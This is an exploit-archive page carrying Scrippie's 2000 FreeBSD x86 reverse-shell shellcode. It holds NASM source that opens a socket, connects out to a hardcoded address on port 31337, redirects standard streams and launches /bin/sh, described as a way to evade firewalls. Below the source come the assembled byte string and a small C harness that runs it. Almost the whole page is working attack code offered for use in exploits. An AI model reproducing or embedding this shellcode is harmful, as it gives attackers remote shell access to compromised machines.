[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BSD Passive Connection Shellcode
# Published : 2000-11-19
# Author : Scrippie
# Previous Title : execve of /bin/sh after setreuid(0,0)
# Next Title : linux chroot()/execve() code


; Passive Connection Shellcode
;
; Coded by Scrippie - ronald@grafix.nl - http://b0f.freebsd.lublin.pl
; Buffer0verfl0w Security
; Why? This evades firewalls...
;
; YES, this is for NASM, I detest AT&T syntaxis - it's gross and unreadable
;
; This is the FreeBSD variant I whipped up
;
; Tnx to dvorak for pointing out that BSD's int 80h assumes a stored EIP
; on the stack before making it and that BSD has a somewhat different
; sockaddr_in structure (containing sin_len)

        BITS 32

; Equates - keeps this stuff a lot more clear

PORT            equ 31337               ; What an eleet port!

_exit           equ 1                   ; See /usr/src/sys/kern/syscalls.c
execve          equ 59                  ; See /usr/src/sys/kern/syscalls.c
dup2            equ 90                  ; See /usr/src/sys/kern/syscalls.c
socket          equ 97                  ; See /usr/src/sys/kern/syscalls.c
connect         equ 98                  ; See /usr/src/sys/kern/syscalls.c

IPPROTO_TCP     equ 6                   ; See netinet/in.h
PF_INET         equ 2                   ; See sys/socket.h
SOCK_STREAM     equ 1                   ; See sys/socket.h

sockaddr_in_off equ 0
shell_off       equ 8
shell_ptr_off   equ 16

        jmp short EndCode

Start:
        pop esi                         ; Get offset data in esi

        xor eax, eax
        xor ebx, ebx

        mov bl, IPPROTO_TCP             ; Push IPPROTO_TCP
        push ebx
        mov bl, SOCK_STREAM             ; Push SOCK_STREAM
        push ebx
        mov bl, PF_INET                 ; Push PF_INET
        push ebx
        push ebx                        ; Skipped by int 80h
        mov al, socket                  ; Select socket() syscall

        int 80h                         ; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
        mov edx, eax                    ; Save the resulting socket descriptor

        mov byte [esi+sockaddr_in_off+1], PF_INET ; sin_family -> PF_INET
        mov word [esi+sockaddr_in_off+2], PORT  ; Set the port number

        mov bl, 16                      ; sizeof(sockaddr_in)
        push ebx

        lea ebx, [esi+sockaddr_in_off]  ; Get offset sockaddr_in into ebx
        push ebx                        ; Push it
        push eax                        ; Still holds sockfd
        push eax                        ; Canary value

        mov al, connect                 ; Select connect() syscall
        int 80h                         ; connect(sockfd, sockaddr_in, 10)

        xor ebx, ebx
        push ebx
        push edx
        mov al, dup2                    ; Select dup2 syscall

        push eax                        ; Ruined
        int 80h

        inc bl
        push ebx
        push edx
        mov al, dup2                    ; Do the same for stdout
        
        push eax
        int 80h

        inc bl
        push ebx
        push edx
        mov al, dup2                    ; And finally for stderr

        push eax
        int 80h

        xor ebx, ebx
        push ebx                        ; *envp == NULL

        lea edi, [esi+shell_off+7]
        xor eax, eax
        xor ecx, ecx
        mov cl, 9
        repe stosb

        lea ebx, [esi+shell_off]        ; Get offset shell into ebx
        mov [esi+shell_ptr_off], ebx    ; Store it at shell_off
        lea ecx, [esi+shell_ptr_off]    ; Get offset shell_off into ecx
        push ecx                        ; argp
        push ebx                        ; command

        push eax                        ; canary
        mov al, execve
        int 80h                         ; Spawn the frikkin' shell

        mov al, _exit                   ; _exit() system call
        int 80h                         ; Do it

EndCode:
        call Start

sockaddr_in     db 'ABCC'               ; A=sin_len - B=sin_family - C=port
                dd 0x100007f            ; IP addr (s_addr) in htonl() form
; 8 bytes not needed ;)

shell           db '/bin/sh' ;,0
;shell_ptr      db 1,2,3,4

------------------------------------------------------------------------------

And here's the shellcode equivalent

char shellcode[]=
"xebx68x5ex31xc0x31xdbxb3x06x53xb3x01x53xb3x02x53x53xb0x61x
cdx80x89xc2xc6x46x01x02x66xc7x46x02x69x7axb3x10x53x8dx1ex53
x50x50xb0x62xcdx80x31xdbx53x52xb0x5ax50xcdx80xfexc3x53x52xb0
x5ax50xcdx80xfexc3x53x52xb0x5ax50xcdx80x31xdbx53x8dx7ex0fx3
1xc0x31xc9xb1x09xf3xaax8dx5ex08x89x5ex10x8dx4ex10x51x53x50x
b0x3bxcdx80xb0x01xcdx80xe8x93xffxffxffx41x42x43x43x7fx00x00
x01x2fx62x69x6ex2fx73x68";				    ^
						             Start of IP addr
void main() {
        int *ret;

        ret = (int *)&ret + 2;
        (*ret) = (int)shellcode;
}



# www.Syue.com [2000-11-19]